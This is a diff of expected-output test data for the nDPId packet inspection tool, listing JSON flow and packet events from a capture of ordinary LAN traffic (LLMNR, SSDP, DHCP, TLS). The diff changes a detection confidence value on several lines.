{"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":827,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104399959,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":827,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1470104399959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1470104399959,"pkt":"AQBeAAD8uKxv2MGbCABFAAA5S7YAAAERxyfAqAUy4AAA\/PUkFOsAJRvtK70AAAABAAAAAAAAC2NoYXJtaW5nLVBDAAD\/AAE="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":827,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104399959,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":62756,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":827,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104399959,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":62756,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":831,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1470104400059,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104400059,"pkt":"AQBeAAD8GF4PUugBCABFAAA2MRIAAAER4cfAqAU54AAA\/P5+FOsAIr4lNLsAAAABAAAAAAAACFVzaGVyLVBDAAD\/AAE="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":832,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1470104400059,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1470104400059,"pkt":"AQBeAAD8bEAIlAI6CABFAAA4rMMAAAERZh3AqAUw4AAA\/OmVFOsAJO3eTL0AAAABAAAAAAAACkthc3Blci1tYWMAAP8AAQ=="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104400162,"flow_last_seen":1470104400162,"flow_idle_time":200000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":520,"flow_avg_l4_payload_len":520,"midstream":0,"thread_ts_msec":1470104400162,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1470104400162,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":562,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":562,"pkt_l4_len":528,"thread_ts_msec":1470104400162,"pkt":"AQBef\/\/66LH8q\/uyCABFAAIkCfEAAAQR9QTAqAUx7\/\/\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"} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104400162,"flow_last_seen":1470104400162,"flow_idle_time":200000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":520,"flow_avg_l4_payload_len":520,"midstream":0,"thread_ts_msec":1470104400162,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104400162,"flow_last_seen":1470104400162,"flow_idle_time":200000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":520,"flow_avg_l4_payload_len":520,"midstream":0,"thread_ts_msec":1470104400162,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104400162,"flow_last_seen":1470104400162,"flow_idle_time":200000,"flow_min_l4_payload_len":528,"flow_max_l4_payload_len":528,"flow_tot_l4_payload_len":528,"flow_avg_l4_payload_len":528,"midstream":0,"thread_ts_msec":1470104400162,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::c","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01172{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1470104400162,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":590,"pkt_l4_len":536,"thread_ts_msec":1470104400162,"pkt":"MzMAAAAM6LH8q\/uyht1gAAAAAhgRBP6AAAAAAAAACb2B3S\/cV1D\/AgAAAAAAAAAAAAAAAAAMB2wHbAIYYQNOT1RJRlkgKiBIVFRQLzEuMQ0KSG9zdDogW0ZGMDI6OkNdOjE5MDANCk5UOiB1cm46bWljcm9zb2Z0LmNvbTpzZXJ2aWNlOlhfTVNfTWVkaWFSZWNlaXZlclJlZ2lzdHJhcjoxDQpOVFM6IHNzZHA6YWxpdmUNCkxvY2F0aW9uOiBodHRwOi8vW2ZlODA6OjliZDo4MWRkOjJmZGM6NTc1MF06Mjg2OS91cG5waG9zdC91ZGhpc2FwaS5kbGw\/Y29udGVudD11dWlkOjkzMTkzOTVhLTRkMDMtNDc1MC1iYjFiLTQ2NjM5MzNhYjgxMg0KVVNOOiB1dWlkOjkzMTkzOTVhLTRkMDMtNDc1MC1iYjFiLTQ2NjM5MzNhYjgxMjo6dXJuOm1pY3Jvc29mdC5jb206c2VydmljZTpYX01TX01lZGlhUmVjZWl2ZXJSZWdpc3RyYXI6MQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT05MDANClNlcnZlcjogTWljcm9zb2Z0LVdpbmRvd3MvMTAuMCBVUG5QLzEuMCBVUG5QLURldmljZS1Ib3N0LzEuMA0KT1BUOiJodHRwOi8vc2NoZW1hcy51cG5wLm9yZy91cG5wLzEvMC8iOyBucz0wMQ0KMDEtTkxTOiBkMDdiNDM1ZDI5OWI0MTc4NGNhM2QyYWUyYjk1OTk0OA0KDQo="} 
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104400162,"flow_last_seen":1470104400162,"flow_idle_time":200000,"flow_min_l4_payload_len":528,"flow_max_l4_payload_len":528,"flow_tot_l4_payload_len":528,"flow_avg_l4_payload_len":528,"midstream":0,"thread_ts_msec":1470104400162,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::c","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104400162,"flow_last_seen":1470104400162,"flow_idle_time":200000,"flow_min_l4_payload_len":528,"flow_max_l4_payload_len":528,"flow_tot_l4_payload_len":528,"flow_avg_l4_payload_len":528,"midstream":0,"thread_ts_msec":1470104400162,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::c","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":839,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1470104400366,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1470104400366,"pkt":"AQBeAAD8uKxv2MGbCABFAAA5S7cAAAERxybAqAUy4AAA\/PUkFOsAJRvtK70AAAABAAAAAAAAC2NoYXJtaW5nLVBDAAD\/AAE="} 
01117{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":840,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1470104400366,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":548,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":548,"pkt_l4_len":514,"thread_ts_msec":1470104400366,"pkt":"AQBef\/\/66LH8q\/uyCABFAAIWCfIAAAQR9RHAqAUx7\/\/\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"} 01151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1470104400366,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":576,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":576,"pkt_l4_len":522,"thread_ts_msec":1470104400366,"pkt":"MzMAAAAM6LH8q\/uyht1gAAAAAgoRBP6AAAAAAAAACb2B3S\/cV1D\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"} 
@@ -358,7 +358,7 @@ 00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1470104400983,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104400983,"pkt":"\/\/\/\/\/\/\/\/XNmY3fXzCABFAAFZAABAAEARbn7AqApu\/\/\/\/\/+xA9gABRTgx\/\/8AAKAAXNmY3fXzwKgKbgAAAgAnAUROUy0xMTAwLTA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABOQVMAAAAAAAAAAAAAVVqvihgAAABVWsE9WwAAAFVasDEuMDJiMTAAEXgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXNmY3fXzM0ExAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRsaW5rLURERjVGMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqApu\/\/8AAExBTjEAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":851,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401187,"flow_last_seen":1470104401187,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104401187,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":50030,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1470104401187,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1470104401187,"pkt":"AQBeAAD8uKxv2MGbCABFAAA5S70AAAERxyDAqAUy4AAA\/MNuFOsAJYAi+T0AAAABAAAAAAAAC2NoYXJtaW5nLVBDAAD\/AAE="} 
-00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":851,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401187,"flow_last_seen":1470104401187,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104401187,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":50030,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":851,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401187,"flow_last_seen":1470104401187,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104401187,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":50030,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1470104401902,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104401902,"pkt":"\/\/\/\/\/\/\/\/vO57DLPeCABFAAFIg+0AAEAR9bgAAAAA\/\/\/\/\/wBEAEMBNDMlAQEGANPiBnoAAAAAAAAAAAAAAAAAAAAAAAAAALzuewyz3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBOQIF3DwMZGhjcGNkLTUuNS42DBhhbmRyb2lkLWY3Y2EwZjU3MTI3MGM1MmQ3CQEhAwYPHDM6O\/8A"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":862,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401904,"flow_last_seen":1470104401904,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104401904,"l3_proto":"ip4","src_ip":"59.120.208.212","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1470104401904,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104401904,"pkt":"\/\/\/\/\/\/\/\/ABNyFooyCABFAABEAABAAEARLl07eNDU\/\/\/\/\/4AAB5sAMADiZERZY1RjNFBBQUJQY0dWdVluUnpBSFZ0Ukc5c2IzSlRhWFJCYldVQQ=="} 
@@ -366,56 +366,56 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1470104402238,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104402238,"pkt":"ABAj4ACgYMVHBbyMCABFAABAGihAAEAGJuTAqAUQwKhzS9F5AbtwBJ91AAAAALAC\/\/\/WVQAAAgQFtAEDAwUBAQgKGg9qPQAAAAAEAgAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1470104402239,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104402239,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XnKmfzXcASfdoASFtC0YwAAAgQFtAEBBAIBAwMH"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1470104402239,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104402239,"pkt":"ABAj4ACgYMVHBbyMCABFAAAosclAAEAGj1rAqAUQwKhzS9F5AbtwBJ92ypn82FAQIADsBQAAyQ4pxaWW"} 
-00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":875,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104402238,"flow_last_seen":1470104402240,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104402240,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":877,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104402238,"flow_last_seen":1470104402243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104402243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":875,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104402238,"flow_last_seen":1470104402240,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104402240,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":877,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104402238,"flow_last_seen":1470104402243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104402243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":200000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1470104402518,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":56861,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1470104402518,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":177,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":177,"pkt_l4_len":143,"thread_ts_msec":1470104402518,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAACjAABAAEARAqHAqHcB\/\/\/\/\/94dFi4Aj\/bjAAFSEAABAAZMXgzqA2UABQAHMzAwTU5BVAAHAA82LjM1LjEgKHN0YWJsZSkACAAITWlrcm9UaWsACgAEf5YkAAALAAlBWFJKLVg2U0cADAAGUkI0NTBHAA4AAQEADwAQIAGwMAIUAQAAAAAAAAAAAQAQABNldGhlcjItbWFzdGVyLWxvY2Fs"} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":888,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":200000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1470104402518,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:feea:365","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":888,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1470104402518,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":197,"pkt_l4_len":143,"thread_ts_msec":1470104402518,"pkt":"MzMAAAABTF4M6gNlht1gAAAAAI8RAf6AAAAAAAAATl4M\/\/7qA2X\/AgAAAAAAAAAAAAAAAAABFi4WLgCPm0oAAVIRAAEABkxeDOoDZQAFAAczMDBNTkFUAAcADzYuMzUuMSAoc3RhYmxlKQAIAAhNaWtyb1RpawAKAAR\/liQAAAsACUFYUkotWDZTRwAMAAZSQjQ1MEcADgABAQAPABAgAbAwAhQBAAAAAAAAAAABABAAE2V0aGVyMi1tYXN0ZXItbG9jYWw="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":891,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402624,"flow_last_seen":1470104402624,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104402624,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":49735,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":891,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1470104402624,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1470104402624,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACMRAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQADwkcU6wAjpJ6zfgAAAAEAAAAAAAAJV0FOR1MtTFRXAAD\/AAE="} 